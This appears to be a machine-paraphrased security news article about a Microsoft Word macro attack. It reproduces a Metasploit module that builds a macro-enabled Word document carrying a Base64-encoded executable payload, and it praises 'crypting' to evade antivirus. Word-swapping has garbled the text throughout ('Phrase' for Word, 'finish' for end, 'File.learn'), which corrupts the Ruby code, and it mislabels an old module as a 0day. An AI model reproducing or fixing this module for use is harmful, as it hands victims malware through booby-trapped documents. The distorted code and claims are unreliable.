Microsoft Phrase Macro Execution 0day Exploit Discovered

An exploit in Microsoft Workplace Phrase has been found permitting hackers to execute malicious macro-based codes. Attackers can run the exploit in Metasploit and embed a macro virus right into a Microsoft Phrase doc.

Based on WikiPedia:

A macro virus is a virus that’s written in a macro language: a programming language which is embedded inside a software program software (e.g., phrase processors and spreadsheet purposes). Some purposes, comparable to Microsoft Workplace, Excel, Energy level enable macro packages to be embedded in paperwork such that the macros are run routinely when the doc is opened, and this supplies a definite mechanism by which malicious pc directions can unfold. That is one motive it may be harmful to open sudden attachments in e-mails. Many antivirus packages can detect macro viruses, nevertheless they’re nonetheless troublesome to detect and its unfold from the community.

A hacker injecting this exploit right into a community of computer systems could be damaging. A virus comparable to this may unfold like micro organism in a petri-dish. Particularly at the moment the place information are at all times transferred from one pc to a different, not simply in colleges but in addition at work locations and naturally amongst mates and households. The virus can unfold to hundreds of thousands of computer systems inside just some months, weeks, days and even hours.

The exploit was uploaded to an exploit database by an web consumer going by the alias of sinn3r, with the entire code being accessible for anybody to make use of. It’s not sure whether or not sinn3r is the unique creator of the exploit as of but.

See also  WordPress Theme “dance-studio” Susceptible to Arbitrary Shell Add

##
# This module requires Metasploit: http://metasploit.com/obtain
# Present supply: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'

class MetasploitModule “Microsoft Workplace Phrase Malicious Macro Execution”,
‘Description’ => %q{
This module generates a macro-enabled Microsoft Workplace Phrase doc. The feedback
metadata within the information is injected with a Base64 encoded payload, which will likely be
decoded by the macro and execute as a Home windows executable.

For a profitable assault, the sufferer is required to manually allow macro execution.
},
‘License’ => MSF_LICENSE,
‘Writer’ =>
[
‘sinn3r’ # Metasploit
],
‘References’ =>
[
[‘URL’, ‘https://en.wikipedia.org/wiki/Macro_virus’]
],
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘thread’,
‘DisablePayloadHandler’ => true
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
[‘Microsoft Office Word’, {}],
],
‘Privileged’ => false,
‘DisclosureDate’ => “Jan 10 2012”,
‘DefaultTarget’ => 0
))

register_options([
OptString.new(“BODY”, [false, ‘The message for the document body’, ”]),
OptString.new(‘FILENAME’, [true, ‘The Office document macro file’, ‘msf.docm’])
], self.class)
finish

def on_file_read(short_fname, full_fname)
buf = File.learn(full_fname)

case short_fname
when /doc.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore[‘BODY’])
when /core.xml/
b64_payload = ‘ ‘ * 55
b64_payload << Rex::Textual content.encode_base64(generate_payload_exe)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
finish

# The unique filename of __rels is definitely “.rels”.
# However for some motive if that is our authentic filename, it will not be included
# within the archive. So this hacks round that.
case short_fname
when /__rels/
short_fname.gsub!(/__rels/, ‘.rels’)
finish

yield short_fname, buf
finish

def package_docm(path)
zip = Rex::Zip::Archive.new

Dir[“#{path}/**/**”].every do |file|
p = file.sub(path+’/’,”)

if File.listing?(file)
print_status(“Packaging listing: #{file}”)
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status(“Packaging file: #{fname}”)
zip.add_file(fname, buf)
finish
finish
finish

zip.pack
finish

def exploit
print_status(‘Producing our docm file…’)
path = File.be a part of(Msf::Config.install_root, ‘information’, ‘exploits’, ‘office_word_macro’)
docm = package_docm(path)
file_create(docm)
tremendous
finish
finish

See also  Drupal RCE Exploit Has Been Launched for the “Drupalgeddon2” Vulnerability

Viruses embedded into different kinds and codecs of information will also be simply go unnoticed by anti-viruses. Silent viruses and macro viruses comparable to this one can simply be made undetectable by a way known as crypting. Strategies comparable to these have existed for the reason that very first virus was ever created. With time, hackers have gotten smarter and so have their damaging viruses and strategies of undetectability.